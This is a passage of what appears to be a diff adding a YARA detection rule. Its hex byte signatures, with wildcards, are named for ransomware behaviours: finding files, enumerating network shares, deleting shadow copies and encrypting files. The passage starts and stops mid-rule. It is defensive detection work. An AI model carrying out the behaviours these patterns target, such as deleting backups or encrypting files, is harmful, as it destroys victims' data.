+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1
+            ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ??
+            8B 45 ?? 8B 5D ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 53 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 50 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D
+            85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 75 ?? FF 15 ?? ?? ??
+            ?? 50 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B
+            3D ?? ?? ?? ?? 0F 1F 00 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? F7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 8D 85 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? BE ?? ??
+            ?? ?? 66 0F 1F 44 00 ?? FF 36 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 85 ?? ?? ?? ?? 83
+            C6 ?? 81 FE ?? ?? ?? ?? 7C ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85
+        }
+		$find_files_v1_p2 = {
+            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B CB E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
+            8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ??
+            ?? BE ?? ?? ?? ?? 66 0F 1F 44 00 ?? FF 36 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 85 ??
+            ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ?? 8D 85 ?? ?? ?? ?? 50 53 8D 85 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 89 9D ?? ?? ??
+            ?? 89 9D ?? ?? ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 0F 57 C0 83 C4
+            ?? 66 0F D6 06 C7 46 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? 89 06 8B 85 ?? ?? ?? ?? 89 46 ?? C7 46 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B CE 85 C0 75 ?? E8 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 53 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 9D ??
+            ?? ?? ?? 83 C4 ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89
+            0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D
+        }
+		$network_enumeration_v1_p1 = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
+            ?? ?? 53 56 57 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50
+            E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? 83 3A ?? 0F 8E ??
+            ?? ?? ?? 33 DB 89 5C 24 ?? 0F 1F 00 8D 42 ?? 03 C3 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 15 ?? ?? ?? ?? 8B C3 BB ?? ?? ?? ?? 89 44 24 ?? 83 C4 ?? 89 5C 24 ?? 8D 72 ?? 03
+            F0 8B CE 8D 79 ?? 8A 01 41 84 C0 75 ?? 2B CF 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D
+            84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 6A ?? 50 6A
+            ?? 8D 84 24 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ??
+            ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ??
+            ?? ?? ?? 75 ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 8D 44 24 ?? 50 6A ?? 8D 44 24 ?? 50 6A ?? 8D 44
+            24 ?? 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 33
+            FF 39 7C 24 ?? 76 ?? 33 F6 8B 44 24 ?? 83 7C 06 ?? ?? 75 ?? 68 ?? ?? ?? ?? FF 34 06
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 44 24 ?? FF 34 06 8D 44 24 ?? 50 8D 84 24 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 8D 4C 24
+        }
+		$network_enumeration_v1_p2 = {
+            68 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 47 83 C6 ?? 3B 7C 24 ?? 72
+            ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 81 FB ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 15 ?? ?? ??
+            ?? 8B 5C 24 ?? 8B 44 24 ?? 05 ?? ?? ?? ?? 83 EB ?? 89 44 24 ?? 89 5C 24 ?? 0F 85 ??
+            ?? ?? ?? 8B 74 24 ?? 8B 5C 24 ?? 46 81 C3 ?? ?? ?? ?? 89 74 24 ?? 89 5C 24 ?? 3B 32
+            0F 8C ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 3A ?? C7 44 24 ?? ?? ??
+            ?? ?? 0F 8E ?? ?? ?? ?? 33 DB 89 5C 24 ?? 66 0F 1F 44 00 ?? 8D 42 ?? 03 C3 50 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B C3 BB ?? ?? ?? ?? 89 44 24 ?? 83 C4 ??
+            89 5C 24 ?? 8D 72 ?? 03 F0 8B CE 8D 79 ?? 8A 01 41 84 C0 75 ?? 2B CF 0F 84 ?? ?? ??
+            ?? 56 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 44 24 ?? 6A ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85
+            C0 75 ?? FF 15 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 8D 44 24 ?? 50 6A ?? 8D
+        }
+		$network_enumeration_v1_p3 = {
+            44 24 ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 81 FB
+            ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 33 FF 39 7C 24 ?? 76 ?? 33 F6 0F 1F 84 00 ?? ?? ?? ??
+            8B 44 24 ?? 83 7C 06 ?? ?? 75 ?? 68 ?? ?? ?? ?? FF 34 06 E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 75 ?? 8B 44 24 ?? FF 34 06 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 50 8D 84 24
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 47 83 C6 ?? 3B 7C 24 ?? 72 ?? FF 74 24 ?? FF 15 ?? ??
+            ?? ?? 81 FB ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 5C 24 ?? 8B 44 24 ??
+            05 ?? ?? ?? ?? 83 EB ?? 89 44 24 ?? 89 5C 24 ?? 0F 85 ?? ?? ?? ?? 8B 74 24 ?? 8B 5C
+            24 ?? 46 81 C3 ?? ?? ?? ?? 89 74 24 ?? 89 5C 24 ?? 3B 32 0F 8C ?? ?? ?? ?? 68 ?? ??
+            ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 83 C4 ?? 33
+            C0 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$delete_shadow_copies_v1_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 6A ?? 6A ?? FF 15
+            ?? ?? ?? ?? 85 C0 79 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B
+            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A
+            ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 79 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF
+            15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8D 85 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 6A
+            ?? 68 ?? ?? ?? ?? FF D7 85 C0 78 ?? 68 ?? ?? ?? ?? FF D3 8B F0 8D 85 ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 11 56 51 FF 52 ?? 8B F0 8D 85 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 85 F6 0F 88 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF D7 85 C0 79 ?? 50 68
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF D3 8B 8D
+            ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 8B 11 6A ?? 6A ?? 6A ?? 6A
+            ?? 6A ?? 56 51 FF 52 ?? 56 8B F8 FF 15 ?? ?? ?? ?? 85 FF 79 ?? 57 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 8B 08 50 FF 51 ?? E9 ?? ?? ?? ?? 6A ?? 6A ??
+            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 79 ?? 50 68
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 8B 08 50 FF 51 ?? 8B 85 ?? ??
+            ?? ?? 50 8B 08 FF 51 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 68 ?? ?? ?? ?? 8B F8 FF
+        }
+		$delete_shadow_copies_v1_p2 = {
+            D3 8B 8D ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 6A ??
+            8B 11 6A ?? 56 57 51 FF 52 ?? 57 8B 3D ?? ?? ?? ?? 8B D8 FF D7 56 FF D7 85 DB 79 ??
+            53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 8B 08 50 FF 51 ?? 8B 85
+            ?? ?? ?? ?? 50 8B 08 FF 51 ?? E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 01 8D 95 ?? ?? ?? ?? 52 8D 95
+            ?? ?? ?? ?? 52 6A ?? 6A ?? 51 FF 50 ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 6A ?? 52 8B 08 6A ?? 68 ?? ?? ?? ?? 50 FF 51 ??
+            FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D3 83 C4 ?? FF B5 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 8B F8 8D 85 ?? ?? ?? ?? 0F 57 C0 57 56 6A ?? 6A ?? 6A ?? 6A ?? 6A
+            ?? 6A ?? 50 6A ?? 0F 11 07 FF 15 ?? ?? ?? ?? 6A ?? FF 37 FF 15 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            50 8B 08 FF 51 ?? 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 85 C9 0F 85 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 08 FF 51 ?? 8B 85 ?? ?? ?? ?? 50 8B 08 FF 51 ?? 8B 85
+            ?? ?? ?? ?? 50 8B 08 FF 51 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 5F 5E 33 CD
+            5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_v1_p1 = {
+            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? 50 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45
+            ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F9 89 BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 37 83 C4 ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 0F 57 C0 C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48
+            ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 6A ?? 56 8D 8D ?? ?? ??
+            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ??
+            8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? ?? ?? ?? 74 ?? FF
+            15 ?? ?? ?? ?? 50 FF 37 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 E9
+            ?? ?? ?? ?? 6A ?? 83 EC ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 8B 8C 05 ?? ?? ?? ?? 85 C9 74 ?? 8B 01 FF 50
+            ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? C6 45 ?? ?? 8B
+        }
+		$encrypt_files_v1_p2 = {
+            85 ?? ?? ?? ?? 8B 48 ?? F6 84 0D ?? ?? ?? ?? ?? 75 ?? 8B 8C 0D ?? ?? ?? ?? 8D 95 ??
+            ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 01 6A ?? 52 FF 50 ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? EB
+            ?? 0F 57 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 11 85 ??
+            ?? ?? ?? C6 45 ?? ?? 8B 40 ?? 8B 8C 05 ?? ?? ?? ?? 85 C9 74 ?? 8B 01 FF 50 ?? 6A ??
+            C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 83 EC ?? 03 BD ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B B5 ??
+            ?? ?? ?? 8D 45 ?? FF 76 ?? 6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 45 ?? FF 76 ?? 6A ?? 6A ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ??
+            ?? ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50
+            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 6A ?? FF 36 E8 ?? ?? ?? ?? C6 45 ?? ?? 8B
+            85 ?? ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 33 F6 E9 ?? ?? ?? ?? 51 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ??
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 90
+            8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 6A ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 90 8A 01 41 84
+            C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 6A ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
+        }
+		$encrypt_files_v1_p3 = {
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 8B 42 ?? 8B 8C 05 ?? ?? ?? ?? 85 C9 74 ?? 8B 01 FF 50 ?? 8B
+            95 ?? ?? ?? ?? C6 45 ?? ?? 8B 4A ?? 83 BC 0D ?? ?? ?? ?? ?? 75 ?? 8B 8C 0D ?? ?? ??
+            ?? 85 C9 74 ?? 8D 85 ?? ?? ?? ?? 3B C8 74 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 4A
+            ?? 8B 84 0D ?? ?? ?? ?? 85 C0 0F 94 85 ?? ?? ?? ?? C6 45 ?? ?? A8 ?? 75 ?? 8B 8C 0D
+            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 01 6A ?? 52 FF 50 ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? 84 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? EB ?? 0F 57
+            C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 11 85 ?? ?? ?? ??
+            C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
+            8B 85 ?? ?? ?? ?? 8B 40 ?? 8B 8C 05 ?? ?? ?? ?? 85 C9 74 ?? 8B 01 FF 50 ?? C6 45 ??
+            ?? 8B 85 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B F0 83 C4 ?? 89 B5 ?? ?? ?? ?? 85 F6 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 E9 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 83 78 ?? ?? 0F 85 ?? ?? ?? ?? 81 FF ?? ?? ?? ?? 0F 87 ?? ??
+            ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 66 90 BE ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 3B FE 6A ?? 0F
+            42 F7 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 6A ?? 6A
+        }
+		$encrypt_files_v1_p4 = {
+            6A ?? 6A ?? 56 FF B5 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            8D ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 46 ?? 50 FF B5 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C0 ?? 03 C6 89 85 ?? ??
+            ?? ?? 2B FE 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B CF C1 E1 ?? 2B CF 03 C9 83 F9 ?? 0F
+            82 ?? ?? ?? ?? B8 ?? ?? ?? ?? F7 E1 8B FA C1 EF ?? 0F 1F 00 BE ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? 3B FE 6A ?? 0F 42 F7 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 45
+            ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF B5 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ??
+            8D 46 ?? 50 FF B5 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83
+            C0 ?? 03 C6 89 85 ?? ?? ?? ?? 2B FE 0F 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ??
+            03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? FF 37 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D6 83 C4 ?? 83 3D ?? ?? ?? ?? ??
+            75 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ??
+            ?? ?? 50 FF 37 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
